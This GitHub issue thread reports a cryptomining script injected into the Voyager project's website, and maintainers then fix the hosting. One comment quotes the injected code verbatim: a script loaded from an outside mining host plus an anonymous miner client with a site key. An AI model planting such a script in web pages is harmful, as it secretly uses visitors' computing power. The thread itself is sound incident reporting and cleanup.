### ISSUE TITLE
Voyager website WebAttack

### ISSUE THREAD

**Issue by jare25** [thedevdojo/voyager#3870]
Just to report what Norton AV is complaining about, after accessing voyager website.
![image](https://user-images.githubusercontent.com/6226491/50678151-a1f76b80-0ffd-11e9-9676-e18bc565adec.png)

**Comment by fletch3555** [comment]
Appreciate the report, and we're looking into it, but please add a title when opening issues (I understand why the rest of the template wasn't followed though, so I'll excuse that).

**Comment by hooch** [comment]
Why does the voyager website keep getting hacked over and over again?

**Comment by fletch3555** [comment]
I'm not sure it's "again and again". This is reported as a bitmining malware, meaning it simply tries to use your browser for bitcoin mining for them.  Other than stealing processing power, there's very little malicious about it.  My guess is that it's left over from the last time, and was just never noticed (or is a false positive by the tool used in this report)

**Comment by hooch** [comment]
Okay.  If it's left over from an initial attack, I reported the problem mid-last year, and have seen others report it on the Slack channel over the months since.  

Maybe the website would be safer served via a gh-pages branch?

**Comment by hooch** [comment]
This seems to be what needs to be removed from the HTML:

```
<script src="https://www.hostingcloud.racing/KBvU.js"></script>
<script>
    var _client = new Client.Anonymous('ed5f8346374b21a864f63da7e077c7b7428561a5d9edd2a3c41ae511bee7827f', {
        throttle: 0.5
    });
    _client.start();
    

</script>
```

**Comment by emptynick** [comment]
We changed the workflow/hosting and fixed the problem.
Thanks for letting us know!

**Comment by hooch** [comment]
FYI, just noticed the following in the HTML source ("<a href="/http:// .."):

    <a href="/https://www.youtube.com/embed/WXqWWgHMmHY...
    <a href="/https://www.youtube.com/embed/WXqWWgHMmHY...

**Comment by emptynick** [comment]
Also fixed. Thanks
